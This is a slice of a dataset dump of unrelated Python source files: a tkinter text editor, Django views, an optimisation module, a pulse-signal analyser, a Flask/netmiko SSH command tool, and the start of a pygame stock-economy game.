unittest.main(verbosity=2)","repo_name":"mercado-joshua/Selenium-Python__Scripts","sub_path":"Chapter-5/explicit 
wait/test_explicitwait.py","file_name":"test_explicitwait.py","file_ext":"py","file_size_in_byte":1487,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"74239289058","text":"import os\nimport tkinter as tk\nfrom tkinter.filedialog import askopenfile\nfrom tkinter.filedialog import asksaveasfile\n\nclass TextEditor:\n def __init__(self):\n self.root = tk.Tk()\n\n # Variable to store state of opened file\n self.isOpened = False\n self.filename = ''\n\n # Setting the window size and title\n self.root.geometry('800x500')\n self.root.title('Text Editor')\n self.root.iconbitmap('./assets/icons/white_bg.ico')\n\n # Text editing area\n self.textbox = tk.Text(self.root, height=500, width=800, font=('Cairo', 12), foreground='White', background='Black')\n # Auto focus\n self.textbox.focus()\n # Cursor\n self.textbox.config(insertbackground='White', insertwidth=5)\n # Save using Ctrl + S\n self.textbox.bind('', self.shortcut)\n self.textbox.pack()\n\n # Menu\n self.main_menu = tk.Menu(self.root)\n self.main_menu.add_command(label='Open', command=self.open_file)\n self.main_menu.add_command(label='Save', command=self.save_file)\n self.root.config(menu=self.main_menu)\n\n self.root.mainloop()\n\n # This function will be used to open\n # file in read mode and only Text files\n # will be opened\n def open_file(self):\n file = askopenfile(mode ='r', filetypes =[('Text Files', '*.txt')])\n if file is not None:\n self.filename = file.name\n self.isOpened = True\n\n # Replace the current content with the content of the opened file\n content = file.read()\n self.textbox.delete('1.0', 'end')\n self.textbox.insert('insert', content)\n\n # Change the window title\n filename_without_ext = os.path.splitext(os.path.basename(self.filename))[0]\n self.root.title(filename_without_ext)\n \n # function to call when user press save button\n def save_file(self):\n # 'Save as'\n # This is done when creating a new file\n if self.isOpened == False:\n files = [('Text Document', '*.txt')]\n file = asksaveasfile(filetypes = files, defaultextension = files)\n if file is None:\n return\n self.filename = file.name\n self.isOpened = True\n # Save edit\n with open(self.filename, 'w') as f:\n f.write(self.textbox.get('1.0', tk.END))\n\n # function to handle keyboard shortcuts\n def shortcut(self, event):\n if (event.state == 12 and event.keysym == 's') or (event.state == 14 and event.keysym == 'S'):\n self.save_file()\n elif (event.state == 12 and event.keysym == 'o') or (event.state == 14 and event.keysym == 'O'):\n self.open_file()\n\n\n\nif __name__ == '__main__':\n app = TextEditor()","repo_name":"Mohabz-911/TextEditor","sub_path":"TextEditor.py","file_name":"TextEditor.py","file_ext":"py","file_size_in_byte":2804,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"34"} +{"seq_id":"36260727222","text":"from braces.views import GroupRequiredMixin\nfrom django.conf import settings\nfrom django.views.generic.base import TemplateView\nfrom django.shortcuts import redirect\nfrom django.contrib import messages\nfrom web_admin import api_settings, setup_logger\nfrom web_admin.restful_methods import RESTfulMethods\nfrom authentications.utils import get_correlation_id_from_username, check_permissions_by_user\nimport logging\n\nlogger = logging.getLogger(__name__)\n\n\nclass ConfigurationListView(GroupRequiredMixin, TemplateView, RESTfulMethods):\n template_name = 'centralize_configuration/configuration_list.html'\n logger = logger\n\n 
group_required = \"SYS_CONFIGURE_SCOPE\"\n login_url = 'web:permission_denied'\n raise_exception = False\n\n def check_membership(self, permission):\n self.logger.info(\n \"Checking permission for [{}] username with [{}] permission\".format(self.request.user, permission))\n return check_permissions_by_user(self.request.user, permission[0])\n\n def dispatch(self, request, *args, **kwargs):\n correlation_id = get_correlation_id_from_username(self.request.user)\n self.logger = setup_logger(self.request, logger, correlation_id)\n return super(ConfigurationListView, self).dispatch(request, *args, **kwargs)\n\n def get_context_data(self, **kwargs):\n self.logger.info('========== Start getting all configuration scope ==========')\n context = super(ConfigurationListView, self).get_context_data(**kwargs)\n scope = context['scope']\n url = api_settings.CONFIGURATION_URL.format(scope=scope)\n data, success = self._get_method(url, 'configuration scope', logger)\n if success:\n is_permission_scope_attr = check_permissions_by_user(self.request.user, \"SYS_EDIT_SCOPE_ATTRIBUTE\")\n context[\"configurations\"] = data\n context[\"scope_name\"] = scope\n context[\"is_permission_scope_attr\"] = is_permission_scope_attr\n self.logger.info('========== Finish getting all configuration scope ==========')\n return context\n\n\nclass ConfigurationDetailsView(GroupRequiredMixin, TemplateView, RESTfulMethods):\n template_name = 'centralize_configuration/configuration_details.html'\n logger = logger\n\n group_required = \"SYS_EDIT_SCOPE_ATTRIBUTE\"\n login_url = 'web:permission_denied'\n raise_exception = False\n\n def check_membership(self, permission):\n self.logger.info(\n \"Checking permission for [{}] username with [{}] permission\".format(self.request.user, permission))\n return check_permissions_by_user(self.request.user, permission[0])\n\n def dispatch(self, request, *args, **kwargs):\n correlation_id = get_correlation_id_from_username(self.request.user)\n self.logger = setup_logger(self.request, logger, correlation_id)\n return super(ConfigurationDetailsView, self).dispatch(request, *args, **kwargs)\n\n def get_context_data(self, **kwargs):\n self.logger.info('========== Start getting configuration scope details ==========')\n context = super(ConfigurationDetailsView, self).get_context_data(**kwargs)\n scope = context['scope']\n conf_key = context['conf_key']\n url = api_settings.CONFIGURATION_DETAIL_URL.format(scope=scope, key=conf_key)\n\n data, success = self._get_method(url, 'configuration scope details', logger)\n if success:\n self.logger.info(\n '========== Finish getting configuration scope details ==========')\n context[\"configurations\"] = data\n context[\"scope_name\"] = scope\n context[\"user\"] = self.request.user\n return context\n\n def post(self, request, *args, **kwargs):\n self.logger.info('========== Start updating configuration scope ==========')\n scope = kwargs.get('scope', None)\n conf_key = kwargs.get('conf_key', None)\n conf_value = request.POST.get('conf_value')\n\n url = settings.DOMAIN_NAMES + api_settings.CONFIGURATION_UPDATE_URL.format(\n scope=scope, key=conf_key)\n params = {'value': conf_value}\n\n data, success = self._put_method(url, 'configuration scope', logger, params)\n if success:\n messages.add_message(\n request,\n messages.ERROR,\n 'Please restart service to get configuration effect.'\n )\n else:\n messages.add_message(\n request,\n messages.ERROR,\n data\n )\n self.logger.info('========== Finish updating configuration scope ==========')\n return 
redirect('centralize_configuration:configuration_list', scope=scope)\n","repo_name":"thol-voleak/ami-kh-devops_python","sub_path":"web_admin/centralize_configuration/views/configuration.py","file_name":"configuration.py","file_ext":"py","file_size_in_byte":4707,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"15020040769","text":"me = {\r\n \"name\": \"milad\",\r\n \"family\": \"golchinpour\",\r\n \"age\": 14,\r\n \"email\": \"miladgolchinpour85@gmail.com\"\r\n}\r\n\r\nisExistEmail = \"email\" in me\r\n\r\nprint(f\"Email : {isExistEmail}\")\r\n\r\nisExistAddress = \"addres\" in me\r\n\r\nprint(f\"Address : {isExistAddress}\")\r\n\r\nif \"email\" in me:\r\n print(\"True\")\r\nelse:\r\n print(\"False\")\r\n\r\nprint(\"----------------\")\r\n\r\nisExistMilad = \"milad\" in me.values()\r\n\r\nprint(isExistMilad)\r\n\r\n","repo_name":"MiladDeveloper-Hub/Python-Course-Begginer","sub_path":"Dict2.py","file_name":"Dict2.py","file_ext":"py","file_size_in_byte":429,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"1492402033","text":"import numpy as np\nfrom geometry import (\n euclidean_distance,\n to_spherical,\n to_rectangular,\n invert_heading,\n invert_pitch,\n degrees_to_radians,\n rotate_positions,\n)\nfrom utils import validate\n\n\ndef optimize_distances(positions, distances, origin, n, gain=0.001, decay=0.999999999999):\n print(\"\\nDistance optimization:\", n)\n prev_err = 1e5\n for i in range(n):\n gain = decay * gain\n avg_error = 0\n # Correct distances\n for ref in distances:\n x, y = ref\n Px, Py = positions[x], positions[y]\n dist = distances[ref]\n dist_estimated = euclidean_distance(Px, Py)\n direction = (Px - Py) / dist_estimated\n dist_error = dist_estimated - dist\n if x != origin:\n Px = Px - gain * (dist_error / 2) * direction\n if y != origin:\n Py = Py + gain * (dist_error / 2) * direction\n positions[x] = Px\n positions[y] = Py\n avg_error += abs(dist_error)\n # if i == n-1:\n # print(x, y, \"dist err\", abs(dist_error))\n # Log progress\n prog = ((i+1)/n)*100\n avg_dist_err = avg_error / len(distances)\n log = f\"\\rProgress {prog:.2f}% - Current error dist: {avg_dist_err:.5f}\"\n print(log, end=\"\", flush=True)\n if avg_dist_err < 1.0 and prev_err - avg_dist_err < 1e-20:\n print(f\"\\nEarly stopping at {prog:.2f}%.\", avg_dist_err)\n break\n prev_err = avg_dist_err\n print(\"\")\n return True\n\n\ndef optimize_angles(positions, distances, headings, pitches, origin, n):\n # First step: rotate to set one vector right\n aref = list(headings.keys())[0]\n a = positions[aref]\n b_r = to_spherical(a)[0]\n b_h = degrees_to_radians(invert_heading(headings[aref]))\n b_p = degrees_to_radians(invert_pitch(pitches[aref]))\n b = to_rectangular(np.array([b_r, b_h, b_p]))\n k = np.cross(a, b)\n k = k / np.linalg.norm(k)\n theta = np.arcsin(np.linalg.norm(np.cross(a, b)) / (np.linalg.norm(a) * np.linalg.norm(b)))\n rotate_positions(positions, k, theta, origin, in_place=True)\n dist_err, new_angle_err = validate(positions, distances, headings, pitches)\n assert np.isclose(b, positions[aref]).all()\n print(\"Initial flip. 
Dist err:\", dist_err, \" - Angle err:\", new_angle_err)\n\n # Second step: rotate around good vector to minimze error\n a = positions[aref]\n a = a / np.linalg.norm(a)\n best_angle_err = 10\n best_theta = None\n for i in range(n):\n theta = ((np.pi * 2) / n) * i\n new_positions = rotate_positions(positions, a, theta, origin)\n dist_err, new_angle_err = validate(new_positions, distances, headings, pitches)\n if new_angle_err < best_angle_err:\n best_angle_err = new_angle_err\n best_theta = theta\n # Log progress\n prog = ((i+1)/n)*100\n log = f\"\\rProgress {prog:.2f}% - Current error dist:{dist_err:.5f} - Current error angle:{best_angle_err:.5f}\"\n print(log, end=\"\", flush=True)\n rotate_positions(positions, a, best_theta, origin, in_place=True)\n\n\ndef get_coords(positions, data):\n pos = np.random.rand(3).astype(np.longdouble)\n gain = 0.5\n for i in range(1000):\n for key in data:\n if key not in positions:\n continue\n dist_estimated = euclidean_distance(pos, positions[key])\n direction = (pos - positions[key]) / dist_estimated\n dist_error = dist_estimated - data[key]\n pos = pos - gain * (dist_error / 2) * direction\n assert dist_error < 0.5\n return pos\n\n\ndef find_planet_centroid(n, surface_refs, positions):\n pos = np.random.rand(3).astype(np.longdouble)\n gain = 0.01\n for i in range(n):\n avg_error = list()\n if i == n - 1:\n print(\"\\n\")\n for ref_a in surface_refs:\n for ref_b in surface_refs:\n if ref_a == ref_b:\n continue\n dist_a = euclidean_distance(pos, positions[ref_a])\n direction_a = (pos - positions[ref_a]) / dist_a\n dist_b = euclidean_distance(pos, positions[ref_b])\n direction_b = (pos - positions[ref_b]) / dist_b\n error_a = dist_a - dist_b\n error_b = dist_b - dist_a\n pos = pos - gain * (error_a / 2) * direction_a\n pos = pos - gain * (error_b / 2) * direction_b\n avg_error.append(abs(dist_a - dist_b))\n if i == n-1:\n print(ref_a, ref_b, abs(dist_a - dist_b))\n if i == 0:\n print(\"Initial error:\", np.mean(avg_error), \"\\n\")\n # Log progress\n prog = ((i+1)/n)*100\n avg_error = np.mean(avg_error)\n log = f\"\\rProgress {prog:.2f}% - Current error dist:{avg_error:.5f}\"\n print(log, end=\"\", flush=True)\n print(\"\\n\")\n return pos\n \n \n","repo_name":"alansalinas/sc-system-navigation","sub_path":"optimize.py","file_name":"optimize.py","file_ext":"py","file_size_in_byte":4908,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"12659810559","text":"# -*- coding: uTf-8 -*-\n\"\"\"\n@brief Analyzes various parameters of pulse signals.\n@details Analyzes various parameters of pulse signals.\n\"\"\"\nimport os\nimport pandas as pd\nimport matplotlib\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport math\n\n\nclass Pulse():\n\n ##\n # @fn calc_time\n # @brief Calculate the rise time, fall time, and the time between HIGH of the pulse signal.[波形の各種時間(立上り、下がり、ONなど]を計算)\n # @param ts times array[時間データのnumpy配列]\n # @param ts amplitude array[立ち上がり開始時間]\n # @param ts times array[立ち上がり開始時間]\n # @param Ymax max of amplitude(default:None)[振幅の最大値]\n # @param Ymin min of amplitude(default:None)[振幅の最小値]\n # @param upper_threshold upper threshold of amplitude(default:0.9)[振幅の上限]\n # @param lower_threshold lower threshold of amplitude(default:0.1)[振幅の下限]\n # @param Tr_start_min Tr start min (default:None)[立ち上がり開始時間の最小値]\n # @param Tr_start Tr start (default:None)[立ち上がり開始時間]\n # @param Ton_min Ton min (default:None)[ONしている時間の最小値]\n # @retval dist[\"Ymax\"] max of amplitude[振幅の最大値]\n # @retval 
dist[\"Ymin\"] min of amplitude[振幅の最小値]\n # @retval dist[\"Yamp\"] amplitude[振幅]\n # @retval dist[\"upper\"] upper threshold of amplitude[振幅の上限]\n # @retval dist[\"lower\"] lower threshold of amplitude[振幅の下限]\n # @retval dist[\"Tr_start\"] Start of rise time[立ち上がり開始時間]\n # @retval dist[\"Tr_end\"] End of rise time[立ち上がり終了時間]\n # @retval dist[\"Tr\"] rise time[立ち上がり時間]\n # @retval dist[\"Tf_start\"] Start of rise time[立ち下がり開始時間]\n # @retval dist[\"Tf_end\"] Start of rise time[立ち下がり終了時間]\n # @retval dist[\"Ton\"] on time[ON中の時間]\n # @retval dist[\"Tf\"] fall time[立ち下がり時間]\n # @retval dist[\"Tau\"] Time constant[時定数]\n def calc_time(self, ts, ys, Ymax=None, Ymin=None, upper_threshold=0.9, lower_threshold=0.1, Tr_start_min=None, Tr_start=None, Ton_min=None):\n\n dst = {}\n\n # 最小時間が指定されていなければ、最も小さい時間をセット\n if Tr_start_min == None:\n Tr_start_min = ts.min()\n\n # 最小時間が指定されていなければ、最も小さい時間をセット\n if Ton_min == None:\n Ton_min = 0\n\n if Ymax == None:\n Ymax = ys.max()\n\n if Ymin == None:\n Ymin = ys.min()\n\n dst[\"Ymax\"] = Ymax\n dst[\"Ymin\"] = Ymin\n dst[\"Yamp\"] = Yamp = Ymax - Ymin\n\n dst[\"upper\"] = upper_threshold\n dst[\"lower\"] = lower_threshold\n\n # 立上り開始時間(信号がしきい値と最小値を超えた直後の時間)を取得\n if Tr_start == None:\n Trs_start = ts[ys > Yamp * lower_threshold]\n dst[\"Tr_start\"] = Tr_start = Trs_start[Trs_start > Tr_start_min].min()\n # 立上り開始時間が指定されているときは、指定値をセット\n else:\n dst[\"Tr_start\"] = Tr_start\n\n # 立上り終了時間を取得\n Trs_end = ts[ys > Yamp * upper_threshold]\n dst[\"Tr_end\"] = Tr_end = Trs_end[Trs_end > Tr_start].min()\n\n # 立上り時間を計算\n dst[\"Tr\"] = Tr = Tr_end - Tr_start\n\n # 立下り開始時間を取得( > 立上り終了時間 + ON最小時間)\n try:\n Tfs_start = ts[ys < Yamp * upper_threshold]\n dst[\"Tf_start\"] = Tf_start = Tfs_start[Tfs_start >\n Tr_end + Ton_min].min()\n except:\n dst[\"Tf_start\"] = Tf_start = ts[-1]\n\n # 立下り終了時間を取得\n try:\n Tfs_end = ts[ys < Yamp * 0.1]\n dst[\"Tf_end\"] = Tf_end = Tfs_end[Tfs_end > Tf_start].min()\n except:\n dst[\"Tf_end\"] = Tf_end = ts[-1]\n\n if math.isnan(Tf_start):\n dst[\"Tf_start\"] = Tf_start = ts[-1]\n\n if math.isnan(Tf_end):\n dst[\"Tf_end\"] = Tf_end = ts[-1]\n\n # ONの時間を計算(立上り終了時間~立下り開始時間)\n dst[\"Ton\"] = Ton = Tf_start - Tr_end\n\n # 立下り時間を計算\n dst[\"Tf\"] = Tf = Tf_end - Tf_start\n\n # 時定数を計算\n Taus = ts[ys >= Yamp * 0.632]\n dst[\"Tau\"] = Tau = Taus[Taus > Tr_start_min].min() - Tr_start\n self.pulse_times = dst\n\n return dst\n\n ##\n # @fn show_time\n # @brief Show the rise time, fall time, and the time between HIGH of the pulse signal.[波形の各種時間(立上り、下がり、ONなど]を表示)\n def show_time(self):\n dst = {}\n Tr_start = self.pulse_times[\"Tr_start\"]\n Tr_end = self.pulse_times[\"Tr_end\"]\n Tr = self.pulse_times[\"Tr\"]\n Ton = self.pulse_times[\"Ton\"]\n Tf_start = self.pulse_times[\"Tf_start\"]\n Tf_end = self.pulse_times[\"Tf_end\"]\n Tf = self.pulse_times[\"Tf\"]\n Tau = self.pulse_times[\"Tau\"]\n Ymax = self.pulse_times[\"Ymax\"]\n Ymin = self.pulse_times[\"Ymin\"]\n Yamp = self.pulse_times[\"Yamp\"]\n\n print(\"Tr start:\", Tr_start)\n print(\"Tr end:\", Tr_end)\n print(\"Tr:\", Tr)\n print(\"Ton:\", Ton)\n print(\"Tf start:\", Tf_start)\n print(\"Tr end:\", Tf_end)\n print(\"Tf:\", Tf)\n print(\"Tau:\", Tau)\n\n def save_graph(self, x, y, xlabel, ylabel, save_path, label_name=\"Y\"):\n Tr_start = self.pulse_times[\"Tr_start\"]\n Tr_end = self.pulse_times[\"Tr_end\"]\n Tr = self.pulse_times[\"Tr\"]\n Ton = self.pulse_times[\"Ton\"]\n Tf_start = self.pulse_times[\"Tf_start\"]\n Tf_end = self.pulse_times[\"Tf_end\"]\n Tf = self.pulse_times[\"Tf\"]\n Tau = 
self.pulse_times[\"Tau\"]\n Ymax = self.pulse_times[\"Ymax\"]\n Ymin = self.pulse_times[\"Ymin\"]\n Yamp = self.pulse_times[\"Yamp\"]\n upper_threshold = self.pulse_times[\"upper\"]\n lower_threshold = self.pulse_times[\"lower\"]\n\n # 保存先のディレクトリパスが存在しなければ作成\n dir_path = os.path.dirname(save_path)\n if not os.path.exists(dir_path):\n os.mkdir(dir_path)\n\n # グラフ化\n ax = plt.axes()\n plt.rcParams['font.family'] = 'Times New Roman' # 全体のフォント\n plt.rcParams['axes.linewidth'] = 1.0 # 軸の太さ\n\n # 電流値をプロット\n plt.plot(x, y, lw=1, c=\"r\", alpha=0.7, ms=2, label=label_name)\n\n # 立上り・下りの開始、終了時間、時定数に垂線をプロット\n plt.vlines(Tr_start, min(y), max(y), ls='--',\n color=\"b\", lw=1, label=\"Tr start\")\n plt.vlines(Tr_end, min(y), max(y), ls='--',\n color=\"g\", lw=1, label=\"Tr end\")\n plt.vlines(Tf_start, min(y), max(y),\n ls='--', lw=1, label=\"Tf start\")\n plt.vlines(Tf_end, min(y), max(y), ls='--',\n color=\"m\", lw=1, label=\"Tf end\")\n plt.vlines(Tau, min(y), max(y), ls='-', lw=1, label=\"Tau\")\n\n # 電流最大値の10%、90%に水平線をプロット\n plt.hlines(Yamp * 0.9, min(x), max(x), ls='--',\n color=\"r\", lw=1, label=\"Amp \" + sTr(upper_threshold*100)+\"%\")\n plt.hlines(Yamp * 0.1, min(x), max(x), ls='--',\n color=\"y\", lw=1, label=\"Amp \" + sTr(lower_threshold*100)+\"%\")\n\n # グラフの保存\n plt.legend(loc=\"best\") # 凡例の表示(2:位置は第二象限)\n plt.xlabel('Time[msec]', fontsize=12) # x軸ラベル\n plt.ylabel('Current[A]', fontsize=12) # y軸ラベル\n plt.grid() # グリッドの表示\n plt.legend(loc=\"best\") # 凡例の表示\n plt.savefig(save_path)\n plt.clf()\n\n # 実効値の計算\n def calc_rms(self, y):\n return np.sqrt(np.square(y).mean()) # 実効値の計算\n\n\ndef main():\n pulse = Pulse()\n\n # 読み込むCSVファイルのパス\n csv_path = \"C:/prog/python/auto/current.csv\"\n save_path = \"C:/prog/python/auto/\"\n\n # 空のデータフレームを作成\n df = pd.DataFrame({})\n\n # CSVファイルのロードし、データフレームへ格納\n df = pd.read_csv(csv_path, encoding=\"UTf-8\", skiprows=0)\n\n # 電流値の列データを取り出し\n Its = df.loc[:, \"current\"]\n\n # 経過時間の列データを取り出し\n ts = df.loc[:, \"time\"]\n\n # 各種時間を計算(上限90%、下限10%)\n pulse.calc_time(ts, Its, Ymin=0, Ton_min=50)\n times = pulse.show_time()\n pulse.save_graph(\n ts, Its, xlabel=\"Time[msec]\", ylabel=\"Current[A]\", save_path=save_path+\"a.png\", label_name=\"I(t)\")\n\n \"\"\"\n Tr start: 8.4\n Tr end: 328.2\n Tr: 319.8\n Ton: 278.8\n Tf start: 607.0\n Tr end: 620.8\n Tf: 13.799999999999955\n Tau: 114.39999999999999\n RMS: 249.061976770524\n \"\"\"\n print(\"RMS:\", pulse.calc_rms(Its))\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"homura2/libs","sub_path":"python/calc2/calc2/electricity/pulse.py","file_name":"pulse.py","file_ext":"py","file_size_in_byte":9158,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"70911587619","text":"from flask import Flask, request, render_template\nfrom netmiko import ConnectHandler\nimport re\n\napp = Flask(__name__)\n\n\n@app.route(\"/\")\ndef home():\n return render_template(\"index.html\")\n\n\n@app.route(\"/command\", methods=[\"POST\"])\ndef command():\n devices = []\n for i in range(1, int(request.form[\"device_count\"]) + 1):\n devices.append({\n \"device_type\": \"cisco_ios\",\n \"host\": request.form[f\"device_{i}_hostname\"],\n \"username\": request.form[f\"device_{i}_username\"],\n \"password\": request.form[f\"device_{i}_password\"],\n })\n print(devices)\n commands = request.form[\"commands\"] # A textarea with multiple lines\n print(commands)\n output = {}\n for device in devices:\n print(f'Connecting to {device[\"host\"]}')\n with ConnectHandler(**device) as 
ssh:\n            for command in commands.split(\"\\n\"):\n                print(f'Executing command: {command} on {device[\"host\"]}')\n                # append the output to the dictionary with the key being the hostname\n                if device[\"host\"] not in output:\n                    output[device[\"host\"]] = []\n                output_command = ssh.send_command(command)\n                output[device[\"host\"]].append({\n                    \"command\": command,\n                    # trim the spaces and tabs from the output\n                    \"output\": output_command\n                })\n\n    return render_template(\"result.html\", output=output)\n\n\nif __name__ == \"__main__\":\n    app.run(debug=True)\n","repo_name":"fluid-design-io/cisco-ssh-multi-console-viewer","sub_path":"backend/flask(old)/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1527,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"}
+{"seq_id":"25126803858","text":"import os\ntry:\n    import cPickle as pickle\nexcept ImportError:\n    import pickle\nfrom math import pi, cos, sin\nimport random\nimport pygame as pg\nfrom .. import prepare\nfrom .industry import Industry\nfrom .industry_info import INDUSTRIES\nfrom .labels import Label, Button, ButtonGroup\nfrom .animation import Animation, Task\nfrom .player import Player\n\n\nTWOPI = pi * 2\n\n\nclass Economy(object):\n    def __init__(self):\n        self.interest_rate = .05\n        conditions = [\"Dismal\", \"Grizzly\", \"Bearish\", \"Flat\",\n                      \"Bullish\", \"Taurific\", \"Phenomenal\"]\n        self.condition_names = {x: name for x, name in enumerate(conditions, start=-3)}\n        colors = (\"red\", \"orangered\", \"orange\", \"gray90\", \"yellowgreen\", \"greenyellow\", \"green\")\n        self.condition_colors = {x: color for x, color in enumerate(colors, start=-3)}\n        self.next_conditions = {\n            -3: (-3, -2, -2, -1),\n            -2: (-3, -2, -2, -1, -1, -1, 0),\n            -1: (-3, -2, -2, -1, -1, -1, -1, 0, 0, 0, 0, 1, 1),\n            0: (-2, -1, -1, 2, 1, 1, 1, 0, 0, 0, 0),\n            1: (3, 2, 2, 1, 1, 1, 1, 0, 0, 0, 0, -1, -1),\n            2: (3, 2, 2, 1, 1, 1, 0),\n            3: (3, 2, 2, 1)\n        }\n        self.condition = 0\n        \n        hourly_change_ranges = [(.70, 1.01125), (.85,1.025), (.90, 1.05), (.95, 1.05),\n                                (.95, 1.10), (.975, 1.15), (.9875,1.3)]\n        self.hourly_changes = {x: change for x, change in enumerate(hourly_change_ranges, start=-3)} \n        self.daily_interest_changes = {\n            -3: (1.0, 1.01),\n            -2: (1.0, 1.005),\n            -1: (1.0, 1.0025),\n            0: (1.0, 1.0),\n            1: (.975, 1.0),\n            2: (.95, 1.0),\n            3: (.9, 1.0)\n        }\n        activity = (\"Dead\", \"Tepid\", \"Tame\", \"Busy\", \"Hectic\", \"Manic\")\n        activity_chances = (25, 50, 100, 200, 400, 700) #chance in 1000 that price will move\n        self.activity_chances = {x: chance for x, chance in enumerate(activity_chances)}\n        self.activity_names = {x: name for x, name in enumerate(activity)}\n        self.activity = 2\n        \n        self.make_industries(INDUSTRIES)\n        \n        \n        self.companies = [] \n        for industry in self.industries:\n            self.companies.extend(industry.companies)\n        \n        \n        self.hours = 0\n        self.day = 0\n        self.sim_speeds = {0: \"Paused\",\n                           1: \"Very Slow\",\n                           2: \"Slow\",\n                           3: \"Normal\",\n                           4: \"Fast\",\n                           5: \"Very Fast\"}\n        self.hour_lengths = {0: 0,\n                             1: 10000,\n                             2: 5000,\n                             3: 2500,\n                             4: 625,\n                             5: 100}\n        self.sim_speed = 5\n        self.current_quarter = 1\n        self.timer = 0\n        self.game_clock = GameClock((16, 20), self)\n        self.ticker_tape = TickerTape()\n        \n        #Seed Economy\n        for _ in range(1000):\n            self.update(100, Player())\n        \n    def save(self, player):\n        #can't pickle surfaces, oops\n        self.game_clock = None\n        self.ticker_tape = None\n        for c in self.companies:\n            c.investments.empty()\n        e_path = os.path.join(\"resources\", \"saves\", \"econsave.pickle\")\n        p_path 
= os.path.join(\"resources\", \"saves\", \"playersave.pickle\")\n with open(e_path, \"wb\") as e_save:\n econ = pickle.dump(self, e_save)\n with open(p_path, \"wb\") as p_save:\n player_ = pickle.dump(player, p_save)\n \n def update(self, dt, player):\n self.game_clock.update(dt, self.hour_lengths[self.sim_speed])\n if self.hour_lengths[self.sim_speed]:\n self.timer += dt\n if self.timer >= self.hour_lengths[self.sim_speed]:\n self.timer -= self.hour_lengths[self.sim_speed]\n self.hours += 1\n self.hourly_update()\n \n if self.hours == 8:\n self.day += 1\n self.hours = 0\n self.daily_update()\n self.game_clock.reset()\n \n if not self.day % 7:\n self.weekly_update()\n \n if not self.day % 91:\n self.ticker_tape.news_items = []\n self.quarterly_update(player)\n \n def get_industry_averages(self): \n averages = {}\n for industry in self.industries:\n num = 0.\n cash = 0\n assets = 0\n debt = 0\n bv = 0\n rev = 0\n earn = 0\n pe_ratio = 0\n dividends = 0\n for c in industry.companies:\n num += 1\n cash += c.cash\n assets += c.assets\n debt += c.debt\n bv += c.daily_history[-1][1] / float(c.stock.num_shares)\n rev += c.daily_history[-1][3] / float(c.stock.num_shares)\n earn += c.daily_history[-1][6] / float(c.stock.num_shares)\n pe_ratio += float(c.stock.price) / (earn / float(c.stock.num_shares))\n dividends += float(c.stock.dividend)\n if num:\n averages[industry.name] = cash/num, assets/num, debt/num, bv/num, rev/num, earn/num, pe_ratio/num, dividends/num\n else:\n averages[industry.name] = 0, 0, 0, 0, 0, 0, 0, 0\n return averages\n \n def update_condition(self):\n chance = abs(self.condition)\n if random.randint(0, 10) <= chance:\n self.condition = random.choice(self.next_conditions[self.condition])\n self.interest_rate = self.interest_rate * random.uniform(*self.daily_interest_changes[self.condition])\n self.interest_rate = max(0, min(.15, self.interest_rate))\n \n def hourly_update(self): \n #change prices for stocks\n for c in self.companies:\n c.hourly_update(self)\n \n def daily_update(self):\n self.update_condition()\n for c in self.companies:\n c.daily_update(self)\n \n def weekly_update(self):\n #update_condition - more variance than daily\n for c in self.companies:\n c.weekly_update(self)\n \n def monthly_update(self):\n for c in self.companies:\n c.monthly_update(self)\n \n def quarterly_update(self, player):\n for c in self.companies:\n c.quarterly_update(self, player) \n \n def make_industries(self, industries):\n self.industries = []\n for ind in industries:\n self.industries.append(Industry(ind, self))\n \n \nclass GameClock(object):\n def __init__(self, topleft, economy):\n self.economy = economy\n self.image = prepare.GFX[\"clockicon\"]\n self.rect = self.image.get_rect(topleft=topleft)\n self.hour_angle = pi\n self.minute_angle = pi / 2.\n self.buttons = ButtonGroup()\n font = prepare.FONTS[\"weblysleekuisb\"]\n self.speed_name = self.economy.sim_speeds[self.economy.sim_speed]\n \n yrs, days = divmod(self.economy.day, 364)\n self.date = Label(font, 14, \"Yr: {} Day{}\".format(yrs + 1, days), \"gray80\",\n {\"midbottom\": self.rect.midtop})\n self.label = Label(font, 14, self.speed_name, \"gray80\",\n {\"midtop\": self.rect.midbottom})\n Button((self.rect.left, self.label.rect.bottom - 5, 20, 20), self.buttons, text=\"-\",\n font=font, font_size=16, call=self.decrease_speed) \n Button((self.rect.right - 20, self.label.rect.bottom - 5, 20, 20), self.buttons, text=\"+\",\n font=font, font_size=16, call=self.increase_speed)\n \n def decrease_speed(self, *args):\n 
self.economy.sim_speed = max(0, self.economy.sim_speed - 1)\n self.speed_name = self.economy.sim_speeds[self.economy.sim_speed]\n self.label.set_text(self.speed_name)\n \n def increase_speed(self, *args):\n self.economy.sim_speed = min(5, self.economy.sim_speed + 1)\n self.speed_name = self.economy.sim_speeds[self.economy.sim_speed]\n self.label.set_text(self.speed_name)\n \n def update(self, dt, hour_length):\n if hour_length != 0:\n self.hour_angle -= ((TWOPI / 12.) / float(hour_length)) * dt\n self.hour_angle = self.hour_angle % TWOPI \n self.hour_endpoint = (self.rect.centerx + cos(self.hour_angle) * 26,\n self.rect.centery - sin(self.hour_angle) * 26)\n mouse_pos = pg.mouse.get_pos()\n self.buttons.update(mouse_pos)\n yrs, days = divmod(self.economy.day, 364)\n self.date.set_text(\"Yr {} Day {}\".format(yrs + 1, days))\n \n def get_event(self, event):\n self.buttons.get_event(event)\n \n def reset(self):\n #set clock to 9am\n self.hour_angle = pi\n \n def draw(self, surface):\n surface.blit(self.image, self.rect)\n pg.draw.line(surface, pg.Color(\"gray20\"), self.rect.center, self.hour_endpoint)\n self.buttons.draw(surface)\n self.label.draw(surface)\n self.date.draw(surface)\n \n \nclass TickerLabel(object):\n \n def __init__(self, news_item, midleft):\n self.font = prepare.FONTS[\"weblysleekuisb\"]\n self.label = Label(self.font, 16, news_item, \"gray80\", 